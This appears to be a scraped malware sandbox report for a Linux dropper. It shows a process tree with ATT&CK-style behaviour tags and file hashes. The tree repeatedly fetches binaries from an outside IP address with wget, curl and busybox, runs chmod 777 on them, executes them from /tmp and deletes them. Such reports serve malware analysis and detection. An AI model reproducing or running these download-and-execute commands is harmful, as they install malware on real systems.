/bin/busybox/bin/busybox wget http://87.120.84.230/bins/aht8qi13vR83cufA19JeM2QdZqklsVQxUe2⤵PID:950
-
-
/bin/chmodchmod 777 aht8qi13vR83cufA19JeM2QdZqklsVQxUe2⤵
- File and Directory Permissions Modification
PID:951
-
-
/tmp/aht8qi13vR83cufA19JeM2QdZqklsVQxUe./aht8qi13vR83cufA19JeM2QdZqklsVQxUe2⤵
- Executes dropped EXE
PID:952
-
-
/bin/rmrm aht8qi13vR83cufA19JeM2QdZqklsVQxUe2⤵PID:953
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq12⤵PID:954
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:955
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq12⤵PID:956
-
-
/bin/chmodchmod 777 MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq12⤵
- File and Directory Permissions Modification
PID:957
-
-
/tmp/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq1./MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq12⤵
- Executes dropped EXE
PID:958
-
-
/bin/rmrm MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq12⤵PID:959
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs2⤵PID:960
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:961
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs2⤵PID:962
-
-
/bin/chmodchmod 777 Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs2⤵
- File and Directory Permissions Modification
PID:963
-
-
/tmp/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs./Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs2⤵
- Executes dropped EXE
PID:964
-
-
/bin/rmrm Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs2⤵PID:965
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/93SohCRyB65qsR9PHr0olpVOMBCDET7daz2⤵PID:966
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/93SohCRyB65qsR9PHr0olpVOMBCDET7daz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:967
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/93SohCRyB65qsR9PHr0olpVOMBCDET7daz2⤵PID:968
-
-
/bin/chmodchmod 777 93SohCRyB65qsR9PHr0olpVOMBCDET7daz2⤵
- File and Directory Permissions Modification
PID:969
-
-
/tmp/93SohCRyB65qsR9PHr0olpVOMBCDET7daz./93SohCRyB65qsR9PHr0olpVOMBCDET7daz2⤵
- Executes dropped EXE
PID:970
-
-
/bin/rmrm 93SohCRyB65qsR9PHr0olpVOMBCDET7daz2⤵PID:971
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm2⤵PID:972
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:973
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm2⤵PID:974
-
-
/bin/chmodchmod 777 i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm2⤵
- File and Directory Permissions Modification
PID:975
-
-
/tmp/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm./i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm2⤵
- Executes dropped EXE
PID:976
-
-
/bin/rmrm i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm2⤵PID:977
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg2⤵PID:978
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:979
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg2⤵PID:980
-
-
/bin/chmodchmod 777 0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg2⤵
- File and Directory Permissions Modification
PID:981
-
-
/tmp/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg./0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg2⤵
- Executes dropped EXE
PID:982
-
-
/bin/rmrm 0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg2⤵PID:983
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO2⤵PID:984
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:985
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO2⤵PID:986
-
-
/bin/chmodchmod 777 3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO2⤵
- File and Directory Permissions Modification
PID:987
-
-
/tmp/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO./3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO2⤵
- Executes dropped EXE
PID:988
-
-
/bin/rmrm 3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO2⤵PID:989
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97